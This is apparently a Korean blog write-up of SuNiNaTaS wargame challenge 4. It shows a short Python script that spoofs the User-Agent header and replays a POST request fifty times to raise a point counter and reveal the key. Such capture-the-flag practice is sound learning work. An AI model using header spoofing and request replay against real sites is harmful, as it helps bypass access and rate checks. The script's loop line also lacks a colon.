SuNiNaTaS(써니나타스) 4번

User-Agent의 내용 뭔가 익숙하다. PHP의 $_SERVER변수를 공부할 때 나왔던 내용

우선 플러스 버튼을 누르면 Point숫자가 계속해서 올라간다.

소스코드의 힌트를 우선 보겠다.

직접 플러스 버튼을 눌러 50포인트를 만들어보려고 했다.

25포인트에서 더 이상 올라가지 않고 이 창이 뜨게 된다. 역시나 직접 눌러서 포인트를 50으로 만드는 방법은 아닌듯하다.

그리고 경고창에서 얻을 수 있는 힌트 한가지 더 SuNiNaTaS 브라우저를 좋아한다고 한다.

User-Agent의 값도  SuNiNaTaS로 바꿔줘야 할것 같다.

 

post방식으로 값이 전달되고 있으며 submit역할을 하는 버튼은 Plus버튼이다.

web04_ck.asp로 값이 전달되고있는데 즉 플러스를 눌러서 포인트를 증가할때마다 문제페이지와 web04_ck.asp를 왔다갔다 하고 있는 것이다.

버프스위트르 활용하면 간단하게 풀릴 문제지만

파이썬 실습을 위해서 파이썬을 이용해 풀어보겠다.

 

import requests

url = 'http://suninatas.com/challenge/web04/web04.asp'
url_ck = 'http://suninatas.com/challenge/web04/web04_ck.asp'

s = requests.Session()
headers = {'User-Agent' : 'SuNiNaTaS'}


for i in range(50)
    s.post(url_ck, headers=headers)
        
res = s.get(url, headers=headers)
print(res.text)

request묘듈을 사용했다.

헤더에 User-Agent값을 조작해주고

50번동안 web04_ck.asp를 왔다갔다 해주며 포인트를 50으로 만들어 준다.

그리고 페이지의 소스코드를 출력

(처음 문제페이지의 물음표 부분에 키가 줄력되므로)

 

해결.

 

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